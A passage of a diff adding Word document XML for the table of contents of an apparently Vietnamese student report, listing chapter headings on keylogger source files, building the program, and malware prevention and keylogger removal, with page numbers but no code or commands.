+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              <w:noProof/>
+              <w:sz w:val="28"/>
+              <w:szCs w:val="28"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc57761772" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:noProof/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>2.2. File Keylogger.h</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc57761772 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>17</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              <w:noProof/>
+              <w:sz w:val="28"/>
+              <w:szCs w:val="28"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc57761773" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:noProof/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>2.3. File Keylogger.cpp</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc57761773 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>21</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              <w:noProof/>
+              <w:sz w:val="28"/>
+              <w:szCs w:val="28"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc57761774" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:noProof/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>2.4. Build chương trình</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc57761774 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>23</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              <w:noProof/>
+              <w:sz w:val="28"/>
+              <w:szCs w:val="28"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc57761775" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:noProof/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>2.5. Những hướng phát triển của Project</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc57761775 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>23</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rStyle w:val="Hyperlink"/>
+              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              <w:noProof/>
+              <w:sz w:val="28"/>
+              <w:szCs w:val="28"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc57761776" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:noProof/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>*/ Tiểu kết chương 2:</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc57761776 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>25</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p/>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC1"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              <w:noProof/>
+              <w:sz w:val="28"/>
+              <w:szCs w:val="28"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc57761777" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:noProof/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>CHƯƠNG III: PHƯƠNG PHÁP PHÒNG CHỐNG MÃ ĐỘC</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc57761777 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>26</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              <w:noProof/>
+              <w:sz w:val="28"/>
+              <w:szCs w:val="28"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc57761778" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:noProof/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>3.1. Các phương pháp phòng tránh mã độc hiệu quả</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc57761778 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>26</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              <w:noProof/>
+              <w:sz w:val="28"/>
+              <w:szCs w:val="28"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc57761779" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:noProof/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>3.2. Cách xóa Keylogger khỏi máy tính</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc57761779 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>29</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rStyle w:val="Hyperlink"/>
+              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              <w:noProof/>
+              <w:sz w:val="28"/>
+              <w:szCs w:val="28"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc57761780" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:noProof/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>*/ Tiểu kết chương 3:</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc57761780 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>30</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p/>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC1"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
+            </w:tabs>
+            <w:rPr>
